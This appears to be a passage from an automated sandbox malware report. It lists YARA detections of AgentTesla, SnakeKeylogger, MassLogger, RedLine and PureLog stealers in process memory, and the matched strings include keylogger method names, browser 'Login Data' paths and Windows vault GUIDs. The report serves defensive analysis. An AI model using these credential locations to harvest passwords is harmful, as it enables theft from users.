Process Memory Space: svchost.exe PID: 5088	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: svchost.exe PID: 5088	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: svchost.exe PID: 5088	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x229bf:$a20: get_LastAccessed 0x5ea80:$a20: get_LastAccessed 0x261a3:$a30: set_GuidMasterKey 0x6130a:$a30: set_GuidMasterKey 0x23680:$a31: set_username 0x5f512:$a31: set_username 0x4e63a:$a32: set_version 0x4da1f:$a33: get_Clipboard 0x4da49:$a34: get_Keyboard 0x24c27:$a35: get_ShiftKeyDown 0x4e819:$a35: get_ShiftKeyDown 0x24c38:$a36: get_AltKeyDown 0x6049e:$a36: get_AltKeyDown 0x22f4d:$a37: get_Password 0x4da6f:$a37: get_Password 0x255c1:$a39: get_DefaultCredentials 0x60b02:$a39: get_DefaultCredentials
Process Memory Space: svchost.exe PID: 5088	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x4daa5:$a1: get_encryptedPassword 0x4dd61:$a2: get_encryptedUsername 0x4d870:$a3: get_timePasswordChanged 0x4d984:$a4: get_passwordField 0x4dabb:$a5: set_encryptedPassword 0x4ef0f:$a7: get_logins 0x4ec4a:$a8: GetOutlookPasswords 0x4ea75:$a9: StartKeylogger 0x4ee7d:$a10: KeyLoggerEventArgs 0x4ead2:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: server02.exe PID: 6012	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: server02.exe PID: 6012	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: server02.exe PID: 6012	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: server02.exe PID: 6012	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3efd7:$a1: get_encryptedPassword 0x3f304:$a2: get_encryptedUsername 0x3ed78:$a3: get_timePasswordChanged 0x3ee99:$a4: get_passwordField 0x3efed:$a5: set_encryptedPassword 0x4095f:$a7: get_logins 0x40610:$a8: GetOutlookPasswords 0x403ee:$a9: StartKeylogger 0x408af:$a10: KeyLoggerEventArgs 0x4044b:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: neworigin.exe PID: 520	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: neworigin.exe PID: 520	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: svchost.exe PID: 7848	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: svchost.exe PID: 7848	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: svchost.exe PID: 7848	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: svchost.exe PID: 7848	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x67ffd:$a1: get_encryptedPassword 0x682b9:$a2: get_encryptedUsername 0x67dc8:$a3: get_timePasswordChanged 0x67edc:$a4: get_passwordField 0x68013:$a5: set_encryptedPassword 0x69467:$a7: get_logins 0x691a2:$a8: GetOutlookPasswords 0x68fcd:$a9: StartKeylogger 0x693d5:$a10: KeyLoggerEventArgs 0x6902a:$a11: KeyLoggerEventArgsEventHandler
Click to see the 50 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.svchost.exe.5800f16.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.2.svchost.exe.8640000.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.svchost.exe.8400000.11.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.2.svchost.exe.7206478.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.3.svchost.exe.8200000.17.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.0.server02.exe.530000.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
12.0.server02.exe.530000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.0.server02.exe.530000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.0.server02.exe.530000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x10191:$a1: get_encryptedPassword 0x104cd:$a2: get_encryptedUsername 0xff1e:$a3: get_timePasswordChanged 0x1003f:$a4: get_passwordField 0x101a7:$a5: set_encryptedPassword 0x11b77:$a7: get_logins 0x11828:$a8: GetOutlookPasswords 0x11606:$a9: StartKeylogger 0x11ac7:$a10: KeyLoggerEventArgs 0x11663:$a11: KeyLoggerEventArgsEventHandler
12.0.server02.exe.530000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1541d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1491b:$a3: \Google\Chrome\User Data\Default\Login Data 0x14c29:$a4: \Orbitum\User Data\Default\Login Data 0x15a21:$a5: \Kometa\User Data\Default\Login Data
5.2.svchost.exe.5800f16.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.svchost.exe.6fa8b90.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.svchost.exe.8400f08.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.3.svchost.exe.8440000.42.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.2.svchost.exe.5e00f16.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.2.svchost.exe.8b00000.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
33.2.spadixes.exe.35a0000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 CB 88 44 24 2B 88 44 24 2F B0 9A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
34.2.svchost.exe.7206478.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.2.svchost.exe.7205570.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.2.svchost.exe.5e00f16.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.svchost.exe.6f05570.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.svchost.exe.6f05570.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.svchost.exe.6f05570.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.svchost.exe.6f05570.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x72a9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x72b0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x72b97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x72c29:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x72c93:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x72d05:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x72d9b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x72e2b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
34.3.svchost.exe.8600f08.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.3.svchost.exe.8440000.13.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.spadixes.exe.3cc0000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 CB 88 44 24 2B 88 44 24 2F B0 9A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
34.2.svchost.exe.8b00f08.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.svchost.exe.8260000.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.svchost.exe.8260000.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.svchost.exe.6f42790.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.svchost.exe.6f42790.6.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.svchost.exe.6f42790.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.svchost.exe.6f42790.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
34.2.svchost.exe.73bfdf0.6.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
34.2.svchost.exe.73bfdf0.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
34.2.svchost.exe.73bfdf0.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
34.2.svchost.exe.73bfdf0.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x99601:$a1: get_encryptedPassword 0xb1631:$a1: get_encryptedPassword 0xc9651:$a1: get_encryptedPassword 0x9993d:$a2: get_encryptedUsername 0xb196d:$a2: get_encryptedUsername 0xc998d:$a2: get_encryptedUsername 0x9938e:$a3: get_timePasswordChanged 0xb13be:$a3: get_timePasswordChanged 0xc93de:$a3: get_timePasswordChanged 0x994af:$a4: get_passwordField 0xb14df:$a4: get_passwordField 0xc94ff:$a4: get_passwordField 0x99617:$a5: set_encryptedPassword 0xb1647:$a5: set_encryptedPassword 0xc9667:$a5: set_encryptedPassword 0x9afe7:$a7: get_logins 0xb3017:$a7: get_logins 0xcb037:$a7: get_logins 0x9ac98:$a8: GetOutlookPasswords 0xb2cc8:$a8: GetOutlookPasswords 0xcace8:$a8: GetOutlookPasswords
34.2.svchost.exe.73bfdf0.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x9e88d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xb68bd:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xce8dd:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x9dd8b:$a3: \Google\Chrome\User Data\Default\Login Data 0xb5dbb:$a3: \Google\Chrome\User Data\Default\Login Data 0xcdddb:$a3: \Google\Chrome\User Data\Default\Login Data 0x9e099:$a4: \Orbitum\User Data\Default\Login Data 0xb60c9:$a4: \Orbitum\User Data\Default\Login Data 0xce0e9:$a4: \Orbitum\User Data\Default\Login Data 0x9ee91:$a5: \Kometa\User Data\Default\Login Data 0xb6ec1:$a5: \Kometa\User Data\Default\Login Data 0xceee1:$a5: \Kometa\User Data\Default\Login Data
5.2.svchost.exe.70bfdf0.7.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.svchost.exe.70bfdf0.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.svchost.exe.70bfdf0.7.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
5.2.svchost.exe.70bfdf0.7.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.svchost.exe.70bfdf0.7.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.svchost.exe.70bfdf0.7.raw.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x13fcb4:$a20: get_LastAccessed 0x14362d:$a30: set_GuidMasterKey 0x14098d:$a31: set_username 0x9a591:$a32: set_version 0xb25c1:$a32: set_version 0xca5e1:$a32: set_version 0x9955e:$a33: get_Clipboard 0xb158e:$a33: get_Clipboard 0xc95ae:$a33: get_Clipboard 0x995a5:$a34: get_Keyboard 0xb15d5:$a34: get_Keyboard 0xc95f5:$a34: get_Keyboard 0x9a7b0:$a35: get_ShiftKeyDown 0xb27e0:$a35: get_ShiftKeyDown 0xca800:$a35: get_ShiftKeyDown 0x141ff4:$a35: get_ShiftKeyDown 0x142005:$a36: get_AltKeyDown 0x995cb:$a37: get_Password 0xb15fb:$a37: get_Password 0xc961b:$a37: get_Password 0x140251:$a37: get_Password
5.2.svchost.exe.70bfdf0.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x99601:$a1: get_encryptedPassword 0xb1631:$a1: get_encryptedPassword 0xc9651:$a1: get_encryptedPassword 0x9993d:$a2: get_encryptedUsername 0xb196d:$a2: get_encryptedUsername 0xc998d:$a2: get_encryptedUsername 0x9938e:$a3: get_timePasswordChanged 0xb13be:$a3: get_timePasswordChanged 0xc93de:$a3: get_timePasswordChanged 0x994af:$a4: get_passwordField 0xb14df:$a4: get_passwordField 0xc94ff:$a4: get_passwordField 0x99617:$a5: set_encryptedPassword 0xb1647:$a5: set_encryptedPassword 0xc9667:$a5: set_encryptedPassword 0x9afe7:$a7: get_logins 0xb3017:$a7: get_logins 0xcb037:$a7: get_logins 0x9ac98:$a8: GetOutlookPasswords 0xb2cc8:$a8: GetOutlookPasswords 0xcace8:$a8: GetOutlookPasswords
5.2.svchost.exe.70bfdf0.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x143f8b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x143ffd:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x144087:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x144119:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x144183:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x1441f5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x14428b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x14431b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.svchost.exe.70bfdf0.7.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x1411a3:$s2: GetPrivateProfileString 0x1407e5:$s3: get_OSFullName 0x9a794:$s5: remove_Key 0x9a82c:$s5: remove_Key 0xb27c4:$s5: remove_Key 0xb285c:$s5: remove_Key 0xca7e4:$s5: remove_Key 0xca87c:$s5: remove_Key 0x141fd5:$s5: remove_Key 0x14219a:$s5: remove_Key 0x9b4e4:$s6: FtpWebRequest 0xb3514:$s6: FtpWebRequest 0xcb534:$s6: FtpWebRequest 0x9d5dc:$s7: logins 0x9eb43:$s7: logins 0x9f612:$s7: logins 0xb560c:$s7: logins 0xb6b73:$s7: logins 0xb7642:$s7: logins 0xcd62c:$s7: logins 0xceb93:$s7: logins
5.2.svchost.exe.70bfdf0.7.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x9d5dc:$s10: logins 0x9eb43:$s10: logins 0x9f612:$s10: logins 0xb560c:$s10: logins 0xb6b73:$s10: logins 0xb7642:$s10: logins 0xcd62c:$s10: logins 0xceb93:$s10: logins 0xcf662:$s10: logins 0x143f6d:$s10: logins 0x1444df:$s10: logins 0x1471de:$s10: logins 0x14729c:$s10: logins 0x148d7e:$s10: logins 0x1446f3:$s11: credential 0x14907c:$s11: credential 0x9955e:$g1: get_Clipboard 0xb158e:$g1: get_Clipboard 0xc95ae:$g1: get_Clipboard 0x995a5:$g2: get_Keyboard 0xb15d5:$g2: get_Keyboard
5.2.svchost.exe.6f42790.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.svchost.exe.6f42790.6.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.svchost.exe.6f42790.6.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33a7b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33aed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33b77:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33c09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33c73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33ce5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33d7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33e0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
13.0.neworigin.exe.2f0000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.0.neworigin.exe.2f0000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
13.0.neworigin.exe.2f0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
34.2.svchost.exe.73873c0.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
34.2.svchost.exe.73873c0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
34.2.svchost.exe.73873c0.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
34.2.svchost.exe.73873c0.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd2031:$a1: get_encryptedPassword 0xea061:$a1: get_encryptedPassword 0x102081:$a1: get_encryptedPassword 0xd236d:$a2: get_encryptedUsername 0xea39d:$a2: get_encryptedUsername 0x1023bd:$a2: get_encryptedUsername 0xd1dbe:$a3: get_timePasswordChanged 0xe9dee:$a3: get_timePasswordChanged 0x101e0e:$a3: get_timePasswordChanged 0xd1edf:$a4: get_passwordField 0xe9f0f:$a4: get_passwordField 0x101f2f:$a4: get_passwordField 0xd2047:$a5: set_encryptedPassword 0xea077:$a5: set_encryptedPassword 0x102097:$a5: set_encryptedPassword 0xd3a17:$a7: get_logins 0xeba47:$a7: get_logins 0x103a67:$a7: get_logins 0xd36c8:$a8: GetOutlookPasswords 0xeb6f8:$a8: GetOutlookPasswords 0x103718:$a8: GetOutlookPasswords
34.2.svchost.exe.8640000.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.3.svchost.exe.8200f08.18.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.2.spadixes.exe.3f20000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 CB 88 44 24 2B 88 44 24 2F B0 9A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
5.3.svchost.exe.8200000.17.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
31.2.spadixes.exe.39e0000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 CB 88 44 24 2B 88 44 24 2F B0 9A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
34.3.svchost.exe.8600000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.svchost.exe.6f05570.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.svchost.exe.6f05570.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.svchost.exe.6f05570.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33a7b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33aed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33b77:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33c09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33c73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33ce5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33d7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33e0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.svchost.exe.8400f08.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.3.svchost.exe.8440000.17.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.3.svchost.exe.8600f08.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.svchost.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 CB 88 44 24 2B 88 44 24 2F B0 9A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
34.3.svchost.exe.8440000.15.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.3.svchost.exe.8480000.41.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.2.svchost.exe.72a8b90.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.3.svchost.exe.8600000.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.2.svchost.exe.8b00f08.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.3.svchost.exe.8440000.14.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.2.svchost.exe.73f8810.7.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
34.2.svchost.exe.73f8810.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
34.2.svchost.exe.73f8810.7.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
34.2.svchost.exe.73f8810.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x60be1:$a1: get_encryptedPassword 0x78c11:$a1: get_encryptedPassword 0x90c31:$a1: get_encryptedPassword 0x60f1d:$a2: get_encryptedUsername 0x78f4d:$a2: get_encryptedUsername 0x90f6d:$a2: get_encryptedUsername 0x6096e:$a3: get_timePasswordChanged 0x7899e:$a3: get_timePasswordChanged 0x909be:$a3: get_timePasswordChanged 0x60a8f:$a4: get_passwordField 0x78abf:$a4: get_passwordField 0x90adf:$a4: get_passwordField 0x60bf7:$a5: set_encryptedPassword 0x78c27:$a5: set_encryptedPassword 0x90c47:$a5: set_encryptedPassword 0x625c7:$a7: get_logins 0x7a5f7:$a7: get_logins 0x92617:$a7: get_logins 0x62278:$a8: GetOutlookPasswords 0x7a2a8:$a8: GetOutlookPasswords 0x922c8:$a8: GetOutlookPasswords
